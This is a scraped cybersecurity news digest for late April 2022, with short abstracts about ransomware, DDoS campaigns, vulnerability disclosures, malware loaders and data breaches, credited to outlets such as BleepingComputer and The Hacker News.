
April 2022

April 30, 2022 – Ransomware

Fake Windows 10 updates infect you with Magniber ransomware Full Text

Abstract Fake Windows 10 updates on crack sites are being used to distribute the Magniber ransomware in a massive campaign that started earlier this month.

BleepingComputer

April 30, 2022 – Vulnerabilities

Microsoft Azure flaws could allow accessing PostgreSQL DBs of other customers Full Text

Abstract Researchers discovered flaws in the Azure Database for PostgreSQL Flexible Server that could result in unauthorized cross-account database access in a region. Microsoft addressed a couple of vulnerabilities impacting the Azure Database for PostgreSQL...

Security Affairs

April 30, 2022 – Attack

Emotet tests new attack chain in low volume campaigns Full Text

Abstract Emotet operators are testing new attack techniques in response to Microsoft's move to disable Visual Basic for Applications (VBA) macros by default. The operators of the infamous Emotet botnet are testing new attack techniques in response to Microsoft's...

Security Affairs

April 30, 2022 – Denial Of Service

Pro-Russian group Killnet launched DDoS attacks on Romanian govt sites Full Text

Abstract A series of DDoS attacks launched by Russian hacktivists are targeting several Romanian government websites. The Romanian national cyber security and incident response team, DNSC, warns of a series of distributed denial-of-service (DDoS) attacks targeting...

Security Affairs

April 29, 2022 – Ransomware

The Week in Ransomware - April 29th 2022 - New operations emerge Full Text

Abstract This week we have discovered numerous new ransomware operations that have begun operating, with one appearing to be a rebrand of previous operations.

BleepingComputer

April 29, 2022 – Breach

Data breach at US healthcare provider ARcare impacts 345,000 individuals Full Text

Abstract Potentially exposed data included names, social security numbers, drivers’ license or state identification numbers, dates of birth, financial account information, and medical treatment information among other confidential information.

The Daily Swig

April 29, 2022 – Attack

Microsoft Documents Over 200 Cyberattacks by Russia Against Ukraine Full Text

Abstract At least six different Russia-aligned actors launched no less than 237 cyberattacks against Ukraine from February 23 to April 8, including 38 discrete destructive attacks that irrevocably destroyed files in hundreds of systems across dozens of organizations in the country. "Collectively, the cyber and kinetic actions work to disrupt or degrade Ukrainian government and military functions and undermine the public's trust in those same institutions," the company's Digital Security Unit (DSU) said in a special report. The major malware families that have been leveraged for destructive activity as part of Russia's relentless digital assaults include: WhisperGate, HermeticWiper (FoxBlade aka KillDisk), HermeticRansom (SonicVote), IssacWiper (Lasainraw), CaddyWiper, DesertBlade, DoubleZero (FiberLake), and Industroyer2. WhisperGate, HermeticWiper, IssacWiper, and CaddyWiper are all data wipers designed to overwrite data and render machines unboot

The Hacker News

April 29, 2022 – General

Cybersecurity and the ‘Good Cause’ Exception to the APA Full Text

Abstract In emergencies, federal agencies can avoid cumbersome rulemaking procedures. Uses of the “good cause” exception following 9/11 and the outbreak of the coronavirus offer insights relevant to the current cybersecurity threats to critical infrastructure.

Lawfare

April 29, 2022 – Attack

Anonymous hacked Russian PSCB Commercial Bank and companies in the energy sector Full Text

Abstract OpRussia continues, less than a week after my last update Anonymous has hacked other Russian companies and leaked their data via DDoSecrets. The #OpRussia launched by Anonymous on Russia after the criminal invasion of Ukraine continues, the collective...

Security Affairs

April 29, 2022 – Breach

Online library app Onleihe faces issues after cyberattack on provider Full Text

Abstract Library lending app Onleihe announced problems lending several media formats offered on the platform, like audio, video, and e-book files, after a cyberattack targeted their vendor.

BleepingComputer

April 29, 2022 – Vulnerabilities

Vulnerable plugins plague the CMS website security landscape Full Text

Abstract According to the report released by the researchers at Sucuri, vulnerable plugins and extensions "account for far more website compromises than out-of-date, core CMS files".

ZDNet

April 29, 2022 – Vulnerabilities

Hurry up, disable AFP on your QNAP NAS until the vendor fixes 8 bugs Full Text

Abstract QNAP urges customers to disable the AFP file service protocol on their NAS devices until it fixes critical Netatalk flaws. Taiwanese vendor QNAP is warning customers to disable the AFP file service protocol on their network-attached storage (NAS)...

Security Affairs

April 29, 2022 – General

Google gives 50% bonus to Android 13 Beta bug bounty hunters Full Text

Abstract Google has announced that all security researchers who report Android 13 Beta vulnerabilities through its Vulnerability Rewards Program (VRP) will get a 50% bonus on top of the standard reward until May 26th, 2022. 

BleepingComputer

April 29, 2022 – Ransomware

Expanding the Conti Ransomware IoCs Using WHOIS and IP Clues Full Text

Abstract A majority of the domain IoCs of Conti ransomware share the same lexical features in that they don’t seem to be English words and follow a succession of consonant-vowel patterns.

CircleID

April 29, 2022 – General

It’s Called BadUSB for a Reason Full Text

Abstract Cybercrime gang FIN7’s badUSB attacks serve as a reminder of two key vulnerabilities present among all organizations. The criminal group had been mailing malware-ridden USBs to various entities in the transport, insurance, and defense industries...

Security Affairs

April 29, 2022 – Government

India to require cybersecurity incident reporting within six hours Full Text

Abstract The Indian government has issued new directives requiring organizations to report cybersecurity incidents to CERT-IN within six hours, even if those incidents are port or vulnerability scans of computer systems.

BleepingComputer

April 29, 2022 – Phishing

Phishing Campaign Delivers Malware to Steal Passwords, Chat Logs, and Crypto Wallets Full Text

Abstract A mass phishing campaign is targeting Windows PCs and aims to deliver malware that can steal usernames, passwords, credit card details, and the contents of cryptocurrency wallets.

ZDNet

April 29, 2022 – Denial Of Service

Ongoing DDoS attacks from compromised sites hit Ukraine Full Text

Abstract Ukraine CERT-UA warns of ongoing DDoS attacks targeting pro-Ukraine sites and the government web portal. Ukraine's computer emergency response team (CERT-UA) announced that it is investigating, along with the National Bank of Ukraine (CSIRT-NBU),...

Security Affairs

April 29, 2022 – Denial Of Service

Russian hacktivists launch DDoS attacks on Romanian govt sites Full Text

Abstract The Romanian national cyber security and incident response team, DNSC, has issued a statement about a series of distributed denial-of-service (DDoS) attacks targeting several public websites managed by the state entities.

BleepingComputer

April 29, 2022 – Vulnerabilities

Many Internet-Exposed Servers Affected by Exploited Redis Vulnerability Full Text

Abstract While Redis statically links the Lua Library, some Debian/Ubuntu packages dynamically link it, leading to a sandbox escape that can be exploited to achieve remote code execution.

Security Week

April 29, 2022 – Breach

More Than $13 Million Stolen From DeFi Platform Deus Finance Full Text

Abstract PeckShield said the attacker stole about $13.4 million worth of cryptocurrency but noted that the platform’s actual losses may be larger. CertiK put the losses at 5,446 ETH, or about $15.7 million.

The Record

April 29, 2022 – Vulnerabilities

Vulnerable plugins, Credit card skimming, SEO spam continue to be a menace: Report Full Text

Abstract Websites containing a recently vulnerable plugin or other extension are most likely to be caught up in malware campaigns. Default configurations of popular website software applications remain a serious liability, according to Sucuri.

Sucuri

April 29, 2022 – General

It’s Called BadUSB for a Reason Full Text

Abstract The ease with which one can purchase a rogue device, thanks to their accessibility and low cost, exacerbates the risk (many costing less than $100 on sites such as AliExpress).

April 28, 2022 – Breach

Attackers Breach ‘Dozens’ of GitHub Repos Using Stolen OAuth Tokens Full Text

Abstract GitHub shared the timeline of the breaches in April 2022. The timeline covers when a threat actor gained access to and stole private repositories belonging to dozens of organizations.

Threatpost

April 28, 2022 – Vulnerabilities

Microsoft Azure Vulnerability Exposes PostgreSQL Databases to Other Customers Full Text

Abstract Microsoft on Thursday disclosed that it addressed a pair of issues with the Azure Database for PostgreSQL Flexible Server that could result in unauthorized cross-account database access in a region. "By exploiting an elevated permissions bug in the Flexible Server authentication process for a replication user, a malicious user could leverage an improperly anchored regular expression to bypass authentication to gain access to other customers' databases," Microsoft Security Response Center (MSRC) said. New York City-based cloud security company Wiz, which uncovered the flaws, dubbed the exploit chain "ExtraReplica." Microsoft said it mitigated the bug within 48 hours of disclosure on January 13, 2022. Specifically, it relates to a case of privilege escalation in the Azure PostgreSQL engine to gain code execution and a cross-account authentication bypass by means of a forged certificate, allowing an attacker to create a database in the target's Azure r

The Hacker News

April 28, 2022 – Government

Indian Govt Orders Organizations to Report Security Breaches Within 6 Hours to CERT-In Full Text

Abstract India's computer and emergency response team, CERT-In, on Thursday published new guidelines that require service providers, intermediaries, data centers, and government entities to compulsorily report cybersecurity incidents, including data breaches, within six hours. "Any service provider, intermediary, data center, body corporate and Government organization shall mandatorily report cyber incidents [...] to CERT-In within six hours of noticing such incidents or being brought to notice about such incidents," the government said in a release. The types of incidents that come under the ambit include, inter alia, compromise of critical systems, targeting scanning, unauthorized access to computers and social media accounts, website defacements, malware deployments, identity theft, DDoS attacks, data breaches and leaks, rogue mobile apps, and attacks against servers and network appliances like routers and IoT devices. The government said it was taking these steps to ens

The Hacker News

April 28, 2022 – Malware

EmoCheck now detects new 64-bit versions of Emotet malware Full Text

Abstract The Japan CERT has released a new version of their EmoCheck utility to detect new 64-bit versions of the Emotet malware that began infecting users this month.

BleepingComputer

April 28, 2022 – Ransomware

Quantum Ransomware Stuns Researchers with Blazing Fast Attack Speed Full Text

Abstract According to the DFIR Report, Quantum ransomware has upped its encryption game as it now encrypts systems within a few hours of penetration within a network. Rapid attacks are concerning as they offer less time for analysts to defend their systems.

Cyware Alerts - Hacker News

April 28, 2022 – Hacker

Experts Detail 3 Hacking Teams Working Under the Umbrella of TA410 Group Full Text

Abstract A cyberespionage threat actor known for targeting a variety of critical infrastructure sectors in Africa, the Middle East, and the U.S. has been observed using an upgraded version of a remote access trojan with information stealing capabilities. Calling TA410 an umbrella group comprised of three teams dubbed FlowingFrog, LookingFrog and JollyFrog, Slovak cybersecurity firm ESET assessed that "these subgroups operate somewhat independently, but that they may share intelligence requirements, an access team that runs their spear-phishing campaigns, and also the team that deploys network infrastructure." TA410 — said to share behavioral and tooling overlaps with APT10 (aka Stone Panda or TA429) — has a history of targeting U.S.-based organizations in the utilities sector as well as diplomatic entities in the Middle East and Africa. Other identified victims of the hacker collective include a manufacturing company in Japan, a mining business in India, and a charity in Isra

The Hacker News

April 28, 2022 – Criminals

Bumblebee, a new malware loader used by multiple crimeware threat actors Full Text

Abstract Threat actors have replaced the BazaLoader and IcedID malware with a new loader called Bumblebee in their campaigns. Cybercriminal groups that were previously using the BazaLoader and IcedID as part of their malware campaigns seem to have adopted...

Security Affairs

April 28, 2022 – Vulnerabilities

Synology warns of critical Netatalk bugs in multiple products Full Text

Abstract Synology has warned customers that some of its network-attached storage (NAS) appliances are exposed to attacks exploiting multiple critical Netatalk vulnerabilities.

BleepingComputer

April 28, 2022 – APT

North Korean APT37 Targets Journalists with GoldBackdoor Full Text

Abstract APT37, suspected to have ties with the North Korean government, was found targeting journalists with sophisticated info-stealer malware dubbed Goldbackdoor. The emails sent to the journalists included a link to download ZIP archives with LNK files. Targets are advised to ensure they don’t open any ...

Cyware Alerts - Hacker News

April 28, 2022 – Education

Everything you need to know to create a Vulnerability Assessment Report Full Text

Abstract You've been asked for a Vulnerability Assessment Report for your organisation and for some of you reading this article, your first thought is likely to be "What is that?" Worry not. This article will answer that very question as well as why you need a Vulnerability Assessment Report and where you can get one from. As it's likely the request for such a report came from an important source such as the Board, a partner, a client or an auditor, there isn't a moment to waste. So let's dive straight in. What is a Vulnerability Assessment Report and why do you need one? A Vulnerability Assessment Report is simply a document that illustrates how you are managing your organisation's vulnerabilities. It's important because, with tens of thousands of new technology flaws being discovered every year, you need to be able to prove that your organisation does its best to avoid attack if you want to be trusted by partners and customers. A best security practi

The Hacker News

April 28, 2022 – Government

CISA published 2021 Top 15 most exploited software vulnerabilities Full Text

Abstract Cybersecurity and Infrastructure Security Agency (CISA) published a list of 2021's top 15 most exploited software vulnerabilities. This...

Security Affairs

April 28, 2022 – Vulnerabilities

Microsoft fixes ExtraReplica Azure bugs that exposed user databases Full Text

Abstract Microsoft has addressed a chain of critical vulnerabilities found in the Azure Database for PostgreSQL Flexible Server that could let malicious users escalate privileges and gain access to other customers' databases after bypassing authentication.

BleepingComputer

April 28, 2022 – Attack

Hundreds of Cyberattacks Launched on Ukraine - Microsoft Report Full Text

Abstract Right before the invasion, at least six distinct Russian actors launched more than 237 attacks. All of these attacks were of a destructive nature and many are still ongoing.

Cyware Alerts - Hacker News

April 28, 2022 – Criminals

Cybercriminals Using New Malware Loader ‘Bumblebee’ in the Wild Full Text

Abstract Cybercriminal actors previously observed delivering BazaLoader and IcedID as part of their malware campaigns are said to have transitioned to a new loader called Bumblebee that's under active development. "Based on the timing of its appearance in the threat landscape and use by multiple cybercriminal groups, it is likely Bumblebee is, if not a direct replacement for BazaLoader, then a new, multifunctional tool used by actors that historically favored other malware," enterprise security firm Proofpoint said in a report shared with The Hacker News. Campaigns distributing the new highly sophisticated loader are said to have commenced in March 2022, while sharing overlaps with malicious activity leading to the deployment of Conti and Diavol ransomware, raising the possibility that the loader could act as a precursor for ransomware attacks. "Threat actors using Bumblebee are associated with malware payloads that have been linked to follow-on ransomware campaigns,

The Hacker News

April 28, 2022 – Denial Of Service

CloudFlare blocked a record HTTPs DDoS attack peaking at 15 rps Full Text

Abstract Cloudflare has mitigated a distributed denial-of-service (DDoS) attack that peaked at 15.3 million requests per second (RPS). Cloudflare announced that it had mitigated a distributed denial-of-service (DDoS) attack that peaked at 15.3 million requests per second...

Security Affairs

April 28, 2022 – Breach

Medical software firm fined €1.5M for leaking data of 490k patients Full Text

Abstract The French data protection authority (CNIL) fined medical software vendor Dedalus Biology EUR 1.5 million for violating three articles of the GDPR (General Data Protection Regulation).

BleepingComputer

April 28, 2022 – Denial Of Service

Multi-Vector DDoS Attacks Surge Full Text

Abstract According to Kaspersky, there has been a 46% rise in the number of attacks. The U.S. accounted for the largest share of targets at 45.01%, followed by China (9.34%) and Germany (4.95%).

Cyware Alerts - Hacker News

April 28, 2022 – Privacy

Twitter’s New Owner Elon Musk Wants DMs to be End-to-End Encrypted like Signal Full Text

Abstract Elon Musk, CEO of SpaceX and Tesla and Twitter's new owner, on Thursday called for adding support for end-to-end encryption (E2EE) to the platform's direct messages (DM) feature. "Twitter DMs should have end to end encryption like Signal, so no one can spy on or hack your messages," Musk said in a tweet. The statement comes days after the microblogging service announced it officially entered into an agreement to be acquired by an entity wholly owned by Elon Musk, with the transaction valued at approximately US$ 44 billion, or US$ 54.20 per share in cash. The deal, which is expected to be closed over the next six months, will see it becoming a privately held company. "Free speech is the bedrock of a functioning democracy, and Twitter is the digital town square where matters vital to the future of humanity are debated," Musk said in a statement. "I also want to make Twitter better than ever by enhancing the product with new features, making t

The Hacker News

April 28, 2022 – Attack

Russia-linked threat actors launched hundreds of cyberattacks on Ukraine Full Text

Abstract Microsoft revealed that Russia launched hundreds of cyberattacks against Ukraine since the beginning of the invasion. Microsoft states that at least six separate Russia-linked threat actors launched more than 237 operations against Ukraine starting...

Security Affairs

April 28, 2022 – Denial Of Service

Ukraine targeted by DDoS attacks from compromised WordPress sites Full Text

Abstract Ukraine's computer emergency response team (CERT-UA) has published an announcement warning of ongoing DDoS (distributed denial of service) attacks targeting pro-Ukraine sites and the government web portal.

BleepingComputer

April 28, 2022 – Phishing

Cybercriminals deliver IRS tax scams and phishing campaigns by mimicking government vendors Full Text

Abstract Cybercriminals purposely choose specific times when all of us are busy with taxes, and preparing for holidays (e.g., Easter), that’s why you need to be especially careful during these times.

Help Net Security

April 28, 2022 – Malware

New RIG Exploit Kit Campaign Infecting Victims’ PCs with RedLine Stealer Full Text

Abstract A new campaign leveraging an exploit kit has been observed abusing an Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan. "When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server," Bitdefender said in a new report shared with The Hacker News. Most of the infections are located in Brazil and Germany, followed by the U.S., Egypt, Canada, China, and Poland, among others. Exploit kits or exploit packs are comprehensive tools that contain a collection of exploits designed to take advantage of vulnerabilities in commonly-used software by scanning infected systems for different kinds of flaws and deploying additional malware. The primary infection method used by attackers to distribute exploit kits, in this case the

The Hacker News

April 28, 2022 – Education

How to Attack Your Own Company’s Service Desk to spot risks Full Text

Abstract Specops Secure Service Desk is an excellent tool for keeping a help desk safe from social engineering attacks. Although Specops Secure Service Desk offers numerous features, there are three capabilities that are especially useful for thwarting social engineering attacks.

BleepingComputer

April 28, 2022 – Business

Veza Raises $110M in Funding Full Text

Abstract Backers included Accel, Bain Capital, Ballistic Ventures, GV, Norwest Venture Partners, and True Ventures, as well as Kevin Mandia, Enrique Salem, Lane Bess, Manoj Apte, Joe Montana, Niels Provos, and Karthik Rangarajan, and many more.

FinSMEs

April 28, 2022 – Malware

New Bumblebee malware replaces Conti’s BazarLoader in cyberattacks Full Text

Abstract A newly discovered malware loader called Bumblebee is likely the latest development of the Conti syndicate, designed to replace the BazarLoader backdoor used to deliver ransomware payloads.

BleepingComputer

April 28, 2022 – Ransomware

Detecting Ransomware’s Stealthy Boot Configuration Edits Full Text

Abstract The hypothesis used by researchers is that threat actors don’t necessarily have to use bcdedit to modify bootloader configurations but could implement code that directly modifies the Windows registry keys that determine those configurations.

Binary Defense

April 28, 2022 – Vulnerabilities

NPM flaw let attackers add anyone as maintainer to malicious packages Full Text

Abstract A logical flaw in the npm registry, dubbed 'package planting', let authors of malicious packages quietly add anyone, and any number of users, as 'maintainers' of their packages in an attempt to boost trust in the package.

BleepingComputer

April 28, 2022 – Denial Of Service

Cloudflare detects one of the largest DDoS attacks on record targeting crypto platform Full Text

Abstract According to Cloudflare, the attack, which lasted less than 15 seconds, was launched from a botnet of approximately 6,000 unique bots and originated from 112 countries around the world.

The Record

April 28, 2022 – General

Ransom payment is roughly 15% of the total cost of ransomware attacks Full Text

Abstract Researchers analyzing the collateral consequences of a ransomware attack found that they include costs roughly seven times higher than the ransom demanded by the threat actors.

BleepingComputer

April 28, 2022 – Outage

Austin Peay State University resumes after ransomware cyber attack Full Text

Abstract Austin Peay State University (APSU) confirmed yesterday that it had been a victim of a ransomware attack. The university, located in Clarksville, Tennessee, advised students, staff, and faculty to disconnect their computers and devices from the university network immediately as a precaution.

BleepingComputer

April 27, 2022 – Vulnerabilities

U.S Cybersecurity Agency Lists 2021’s Top 15 Most Exploited Software Vulnerabilities Full Text

Abstract Log4Shell, ProxyShell, ProxyLogon, ZeroLogon, and flaws in Zoho ManageEngine AD SelfService Plus, Atlassian Confluence, and VMware vSphere Client emerged as some of the top exploited security vulnerabilities in 2021. That's according to a "Top Routinely Exploited Vulnerabilities" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S. Other frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server (CVE-2020-0688), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure (CVE-2019-11510), and a path traversal defect in Fortinet FortiOS and FortiProxy (CVE-2018-13379). Nine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws. "G

The Hacker News

April 27, 2022 – Attack

Cloudflare Thwarts Record DDoS Attack Peaking at 15 Million Requests Per Second Full Text

Abstract Cloudflare on Wednesday disclosed that it acted to mitigate a 15.3 million request-per-second (RPS) distributed denial-of-service (DDoS) attack. The web infrastructure and website security company called it one of the "largest HTTPS DDoS attacks on record." "HTTPS DDoS attacks are more expensive in terms of required computational resources because of the higher cost of establishing a secure TLS encrypted connection," Cloudflare's Omer Yoachimik and Julien Desgats said. "Therefore it costs the attacker more to launch the attack, and for the victim to mitigate it." The volumetric DDoS attack is said to have lasted less than 15 seconds and targeted an unnamed Cloudflare customer operating a crypto launchpad. Volumetric DDoS attacks are designed to overwhelm a target network/service with significantly high volumes of malicious traffic, which typically originate from a botnet under a threat actor's control. Cloudflare said the latest attack w

The Hacker News

April 27, 2022 – Ransomware

Beware: Onyx ransomware destroys files instead of encrypting them Full Text

Abstract A new Onyx ransomware operation is destroying large files instead of encrypting them, preventing those files from being decrypted even if a ransom is paid.

BleepingComputer

April 27, 2022 – Ransomware

PSA: Onyx ransomware destroys large files instead of encrypting them Full Text

Abstract A new Onyx ransomware operation is destroying large files instead of encrypting them, preventing those files from being decrypted even if a ransom is paid.

BleepingComputer

April 27, 2022 – Breach

Student grades stored in Greek education platform UniverSIS could be manipulated via SQLi Full Text

Abstract A SQL injection (SQLi) vulnerability in UniverSIS, an open-source platform developed by Greek universities to manage student data, left academic grades at risk of manipulation.

The Daily Swig

April 27, 2022 – Education

[eBook] Your First 90 Days as MSSP: 10 Steps to Success Full Text

Abstract Bad actors continuously evolve their tactics and are becoming more sophisticated. Within the past couple of years, we've seen supply chain attacks that quickly create widespread damage throughout entire industries. But the attackers aren't just focusing their efforts on supply chains. For example, businesses are becoming increasingly more reliant on SaaS apps and the cloud – creating a new avenue for attackers to steal critical data and assets. The looming threat of ransomware attacks, phishing scams, and destructive BEC campaigns has businesses wondering: do I need to increase my security? As a result, many managed service providers (MSP) are fielding questions about the level of security they can provide for their customers. In this new environment, MSPs are finding they can no longer avoid offering cybersecurity services. Fortunately,  there's an eBook  for MSPs who are expanding into the security space as managed security service providers (MSSP).  It's vital for MSPs to have a

The Hacker News

April 27, 2022 – Government

US Department of State offers $10M reward for info to locate six Russian Sandworm members Full Text

Abstract The U.S. government offers up to $10 million for information that helps identify or locate six Russian GRU hackers who are members of the Sandworm APT group. The US Department of State is offering up to $10 million for information that helps identify or locate...

Security Affairs

April 27, 2022 – Breach

New Black Basta ransomware springs into action with a dozen breaches Full Text

Abstract A new ransomware gang known as Black Basta has quickly catapulted into operation this month, claiming to have breached over twelve companies in just a few weeks.

BleepingComputer

April 27, 2022 – Criminals

Ransomware demands are growing, but life is getting tougher for malware gangs Full Text

Abstract Victims of ransomware attacks are paying higher ransoms than ever before, but there are signs that organizations are starting to take heed of cybersecurity advice, making them more resilient to cybercriminals.

ZDNet

April 27, 2022 – Attack

Chinese Hackers Targeting Russian Military Personnel with Updated PlugX Malware Full Text

Abstract A China-linked government-sponsored threat actor observed striking European diplomatic entities in March may have been targeting Russian government officials with an updated version of a remote access trojan called PlugX. Secureworks attributed the attempted intrusions to a threat actor it tracks as Bronze President, and by the wider cybersecurity community under the monikers Mustang Panda, TA416, HoneyMyte, RedDelta, and PKPLUG. "The war in Ukraine has prompted many countries to deploy their cyber capabilities to gain insight about global events, political machinations, and motivations," the cybersecurity firm said in a report shared with The Hacker News. "This desire for situational awareness often extends to collecting intelligence from allies and 'friends.'" Bronze President, active since at least July 2018, has a history of conducting espionage operations by leveraging custom and publicly available tools to compromise, maintain long-term access,

The Hacker News

April 27, 2022 – Vulnerabilities

Linux Nimbuspwn flaws could allow attackers to deploy sophisticated threats Full Text

Abstract Microsoft disclosed two Linux privilege escalation flaws, collectively named Nimbuspwn, that could allow attackers to conduct various malicious activities. The Microsoft 365 Defender Research Team has discovered two Linux privilege escalation flaws (tracked...

Security Affairs

April 27, 2022 – Breach

GitHub: How stolen OAuth tokens helped breach dozens of orgs Full Text

Abstract GitHub has shared a timeline of this month's security breach when a threat actor gained access to and stole private repositories belonging to dozens of organizations.

BleepingComputer

April 27, 2022 – Vulnerabilities

Chrome 101 Patches 30 Vulnerabilities Full Text

Abstract Google this week announced that Chrome 101 was released to the stable channel with 30 security fixes inside, including 25 for vulnerabilities identified by external security researchers.

Security Week

April 27, 2022 – Privacy

Google’s New Safety Section Shows What Data Android Apps Collect About Users Full Text

Abstract Google on Tuesday officially began rolling out a new "Data safety" section for Android apps on the Play Store to highlight the type of data being collected and shared with third parties. "Users want to know for what purpose their data is being collected and whether the developer is sharing user data with third parties," Suzanne Frey, Vice President of product for Android security and privacy, said. "In addition, users want to understand how app developers are securing user data after an app is downloaded." The transparency measure, which is built along the lines of Apple's "Privacy Nutrition Labels," was first announced by Google nearly a year ago in May 2021. The Data safety section, which will show up against every app listing on the digital storefront, presents a unified view of what data is being collected, for what purpose it's being used, and how it's handled, while also highlighting what data is being shared with thi

The Hacker News

April 27, 2022 – Attack

Wind Turbine giant Deutsche Windtechnik hit by a professional Cyberattack Full Text

Abstract The German wind turbine giant Deutsche Windtechnik was hit by a targeted cyberattack earlier this month. German wind turbine giant Deutsche Windtechnik announced that some of its systems were hit by a targeted professional cyberattack earlier this...

Security Affairs

April 27, 2022 – Vulnerabilities

QNAP warns users to disable AFP until it fixes critical bugs Full Text

Abstract Taiwanese corporation QNAP has asked customers this week to disable the AFP file service protocol on their network-attached storage (NAS) appliances until it fixes multiple critical Netatalk vulnerabilities.

BleepingComputer

April 27, 2022 – Malware

Package Planting: Are You Unknowingly Maintaining Poisoned Packages? Full Text

Abstract Aqua’s Team Nautilus found a logical flaw in npm that allows threat actors to masquerade a malicious package as legitimate and trick unsuspecting developers into installing it.

Aquasec

April 27, 2022 – Hacker

U.S. Offers $10 Million Bounty for Information on 6 Russian Military Hackers Full Text

Abstract The U.S. government on Tuesday announced up to $10 million in rewards for information on six hackers associated with the Russian military intelligence service. "These individuals participated in malicious cyber activities on behalf of the Russian government against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act," the State Department's Rewards for Justice Program said. All six Russian officers are members of an advanced persistent threat group called Sandworm (aka Voodoo Bear or Iron Viking), which is known to have been operating since at least 2008 with a specific focus on targeting entities in Ukraine with the goal of establishing an illicit, long-term presence in order to mine highly sensitive data. The hackers, who are officers of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), are as follows - Artem Valeryevich Ochichenko, who has been linked to technical reconnaissa

The Hacker News

April 27, 2022 – Criminals

Conti ransomware operations surge despite the recent leak Full Text

Abstract The Conti ransomware gang continues to target organizations worldwide despite the massive data leak that has shed light on its operations. Researchers from Secureworks state that the Conti ransomware gang, tracked as the Russia-based threat actor Gold Ulrick,...

Security Affairs

April 27, 2022 – Attack

Microsoft says Russia hit Ukraine with hundreds of cyberattacks Full Text

Abstract Microsoft has revealed the true scale of Russian-backed cyberattacks against Ukraine since the invasion, with hundreds of attempts from multiple Russian hacking groups targeting the country's infrastructure and Ukrainian citizens.

BleepingComputer

April 27, 2022 – Attack

German Wind Turbine Firm Hit by ‘Targeted, Professional Cyberattack’ Full Text

Abstract German wind turbine giant Deutsche Windtechnik has issued a notification to warn that some of its IT systems were impacted in a targeted professional cyberattack earlier this month.

Security Week

April 27, 2022 – Phishing

Russian govt impersonators target telcos in phishing attacks Full Text

Abstract A previously unknown and financially motivated hacking group is impersonating a Russian agency in a phishing campaign targeting entities in Eastern European countries.

BleepingComputer

April 27, 2022 – Business

ARMO Raises $30 Million for Open Source Kubernetes Security Platform Full Text

Abstract The latest investment, which brings ARMO’s total funding to date to $34.5 million, was led by Tiger Global and Hyperwise Ventures, with participation from existing investors Pitango First and Peled Ventures.

Security Week

April 27, 2022 – Vulnerabilities

Cybersecurity agencies reveal top exploited vulnerabilities of 2021 Full Text

Abstract In partnership with the NSA and the FBI, cybersecurity authorities worldwide have released today a list of the top 15 vulnerabilities routinely exploited by threat actors during 2021.

BleepingComputer

April 27, 2022 – Breach

Illinois-based doctor’s group reports data breach affecting patients’ personal, financial data Full Text

Abstract Illinois Gastroenterology Group, based in Gurnee with offices throughout the Chicago area, said they recently experienced a security breach that left their patients’ private data and financial information exposed.

Lake & McHenry County Scanner

April 27, 2022 – Malware

RIG Exploit Kit drops RedLine malware via Internet Explorer bug Full Text

Abstract Threat analysts have uncovered yet another large-scale campaign delivering the RedLine stealer malware onto worldwide targets.

BleepingComputer

April 27, 2022 – Hacker

Chinese state-backed hackers now target Russian state officers Full Text

Abstract Security researchers analyzing a phishing campaign targeting Russian officials found evidence that points to the China-based threat actor tracked as Mustang Panda (also known as HoneyMyte and Bronze President).

BleepingComputer

April 27, 2022 – General

Redis, MongoDB, and Elastic: 2022’s top exposed databases Full Text

Abstract Security researchers have noticed an increase in the number of databases publicly exposed to the Internet, with 308,000 identified in 2021. The growth continued quarter over quarter, peaking in the first months of this year.

BleepingComputer

April 27, 2022 – Vulnerabilities

New Nimbuspwn Linux vulnerability gives hackers root privileges Full Text

Abstract A new set of vulnerabilities collectively tracked as Nimbuspwn could let local attackers escalate privileges on Linux systems to deploy malware ranging from backdoors to ransomware.

BleepingComputer

April 26, 2022 – Vulnerabilities

NPM Bug Allowed Attackers to Distribute Malware as Legitimate Packages Full Text

Abstract A "logical flaw" has been disclosed in NPM, the default package manager for the Node.js JavaScript runtime environment, that enables malicious actors to pass off rogue libraries as legitimate and trick unsuspecting developers into installing them. The supply chain threat has been dubbed "Package Planting" by researchers from cloud security firm Aqua. Following responsible disclosure on February 10, the underlying issue was remediated by NPM on April 26. "Up until recently, NPM allowed adding anyone as a maintainer of the package without notifying these users or getting their consent," Aqua's Yakir Kadkoda said in a report published Tuesday. This effectively meant that an adversary could create malware-laced packages and assign them to trusted, popular maintainers without their knowledge. The idea here is to add credible owners associated with other popular NPM libraries to the attacker-controlled poisoned package in hopes that doing so would a

The Hacker News

April 26, 2022 – Vulnerabilities

Microsoft Discovers New Privilege Escalation Flaws in Linux Operating System Full Text

Abstract Microsoft on Tuesday disclosed a set of two privilege escalation vulnerabilities in the Linux operating system that could potentially allow threat actors to carry out an array of nefarious activities. Collectively called "Nimbuspwn," the flaws "can be chained together to gain root privileges on Linux systems, allowing attackers to deploy payloads, like a root backdoor, and perform other malicious actions via arbitrary root code execution," Jonathan Bar Or of the Microsoft 365 Defender Research Team said in a report. On top of that, the defects — tracked as CVE-2022-29799 and CVE-2022-29800 — could also be weaponized as a vector for root access to deploy more sophisticated threats such as ransomware. The vulnerabilities are rooted in a systemd component called networkd-dispatcher, a daemon program for the network manager system service that's designed to dispatch network status changes. Specifically, they relate to a combination of directory t

The Hacker News

April 26, 2022 – Government

US offers $10 million reward for tips on Russian Sandworm hackers Full Text

Abstract The U.S. is offering up to $10 million to identify or locate six Russian GRU hackers who are part of the notorious Sandworm hacking group.

BleepingComputer

April 26, 2022 – Hacker

TeamTNT has Updated its Attack Tactics Full Text

Abstract TeamTNT hackers' shell scripts were found disabling cloud security tools to attack AWS and Alibaba Cloud. Its payloads include credential stealers, cryptocurrency miners, persistence, and lateral movement. Organizations are suggested to continue taking the right measures to protect their systems fro ...

Cyware Alerts - Hacker News

April 26, 2022 – Botnet

Emotet Testing New Delivery Ideas After Microsoft Disables VBA Macros by Default Full Text

